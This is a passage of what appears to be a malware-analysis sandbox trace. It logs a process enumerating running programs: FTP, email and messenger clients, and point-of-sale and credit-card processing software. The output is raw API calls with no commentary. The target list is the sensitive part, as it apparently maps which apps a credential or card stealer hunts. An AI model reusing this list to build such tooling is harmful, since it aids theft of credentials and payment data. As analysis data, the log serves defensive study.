(HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.533] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0175.534] GetTickCount () returned 0x1172586 [0175.534] GetCurrentThreadId () returned 0xab0 [0175.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.535] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0175.536] GetTickCount () returned 0x1172586 [0175.536] GetCurrentThreadId () returned 0xab0 [0175.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.536] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0175.537] GetTickCount () returned 0x1172586 [0175.537] GetCurrentThreadId () returned 0xab0 [0175.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.537] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0175.538] GetTickCount () returned 0x1172586 [0175.538] GetCurrentThreadId () returned 0xab0 [0175.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.539] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0175.540] GetTickCount () returned 0x1172586 [0175.540] GetCurrentThreadId () returned 0xab0 [0175.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.540] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0175.542] GetTickCount () returned 0x1172586 [0175.542] GetCurrentThreadId () returned 0xab0 [0175.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.542] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0175.543] GetTickCount () returned 0x1172586 [0175.543] GetCurrentThreadId () returned 0xab0 [0175.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.543] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0175.545] GetTickCount () returned 0x1172586 [0175.545] GetCurrentThreadId () returned 0xab0 [0175.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.545] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0175.546] GetTickCount () returned 0x1172586 [0175.546] GetCurrentThreadId () returned 0xab0 [0175.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.546] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0175.548] GetTickCount () returned 0x1172586 [0175.548] GetCurrentThreadId () returned 0xab0 [0175.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.548] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0175.549] GetTickCount () returned 0x1172586 [0175.549] GetCurrentThreadId () returned 0xab0 [0175.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.550] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0175.551] GetTickCount () returned 0x1172596 [0175.551] GetCurrentThreadId () returned 0xab0 [0175.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.551] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0175.553] GetTickCount () returned 0x1172596 [0175.553] GetCurrentThreadId () returned 0xab0 [0175.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.553] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0175.554] GetTickCount () returned 0x1172596 [0175.554] GetCurrentThreadId () returned 0xab0 [0175.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.554] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0175.556] GetTickCount () returned 0x1172596 [0175.556] GetCurrentThreadId () returned 0xab0 [0175.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.556] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0175.557] GetTickCount () returned 0x1172596 [0175.557] GetCurrentThreadId () returned 0xab0 [0175.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.557] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0175.559] GetTickCount () returned 0x1172596 [0175.559] GetCurrentThreadId () returned 0xab0 [0175.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.559] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0175.560] GetTickCount () returned 0x1172596 [0175.560] GetCurrentThreadId () returned 0xab0 [0175.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.560] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0175.561] GetTickCount () returned 0x1172596 [0175.561] GetCurrentThreadId () returned 0xab0 [0175.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.562] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0175.563] GetTickCount () returned 0x1172596 [0175.563] GetCurrentThreadId () returned 0xab0 [0175.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.563] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0175.564] GetTickCount () returned 0x1172596 [0175.564] GetCurrentThreadId () returned 0xab0 [0175.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.565] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0175.566] GetTickCount () returned 0x11725a6 [0175.566] GetCurrentThreadId () returned 0xab0 [0175.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.566] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0175.568] GetTickCount () returned 0x11725a6 [0175.568] GetCurrentThreadId () returned 0xab0 [0175.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.568] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0175.569] GetTickCount () returned 0x11725a6 [0175.569] GetCurrentThreadId () returned 0xab0 [0175.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.569] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0175.570] GetTickCount () returned 0x11725a6 [0175.570] GetCurrentThreadId () returned 0xab0 [0175.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.571] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0175.572] GetTickCount () returned 0x11725a6 [0175.572] GetCurrentThreadId () returned 0xab0 [0175.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.572] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0175.574] GetTickCount () returned 0x11725a6 [0175.574] GetCurrentThreadId () returned 0xab0 [0175.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.574] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0175.575] GetTickCount () returned 0x11725a6 [0175.575] GetCurrentThreadId () returned 0xab0 [0175.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.575] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0175.576] GetTickCount () returned 0x11725a6 [0175.576] GetCurrentThreadId () returned 0xab0 [0175.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.577] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0175.578] GetTickCount () returned 0x11725a6 [0175.578] GetCurrentThreadId () returned 0xab0 [0175.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.578] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0175.579] GetTickCount () returned 0x11725a6 [0175.579] GetCurrentThreadId () returned 0xab0 [0175.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.580] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0175.581] GetTickCount () returned 0x11725a6 [0175.581] GetCurrentThreadId () returned 0xab0 [0175.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.581] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0175.582] GetTickCount () returned 0x11725a6 [0175.582] GetCurrentThreadId () returned 0xab0 [0175.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.582] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0175.584] GetTickCount () returned 0x11725b5 [0175.584] GetCurrentThreadId () returned 0xab0 [0175.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.584] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0175.586] GetTickCount () returned 0x11725b5 [0175.586] GetCurrentThreadId () returned 0xab0 [0175.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.586] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0175.587] GetTickCount () returned 0x11725b5 [0175.587] GetCurrentThreadId () returned 0xab0 [0175.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.587] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0175.588] GetTickCount () returned 0x11725b5 [0175.588] GetCurrentThreadId () returned 0xab0 [0175.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.588] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0175.590] GetTickCount () returned 0x11725b5 [0175.590] GetCurrentThreadId () returned 0xab0 [0175.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.590] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0175.591] GetTickCount () returned 0x11725b5 [0175.591] GetCurrentThreadId () returned 0xab0 [0175.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.592] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="consolidationbeside.exe")) returned 1 [0175.593] GetTickCount () returned 0x11725b5 [0175.593] GetCurrentThreadId () returned 0xab0 [0175.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.593] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrs-manitoba.exe")) returned 1 [0175.594] GetTickCount () returned 0x11725b5 [0175.594] GetCurrentThreadId () returned 0xab0 [0175.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.594] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="internationally-seasonal.exe")) returned 1 [0175.595] GetTickCount () returned 0x11725b5 [0175.595] GetCurrentThreadId () returned 0xab0 [0175.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.596] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.597] GetTickCount () returned 0x11725c5 [0175.597] GetCurrentThreadId () returned 0xab0 [0175.597] 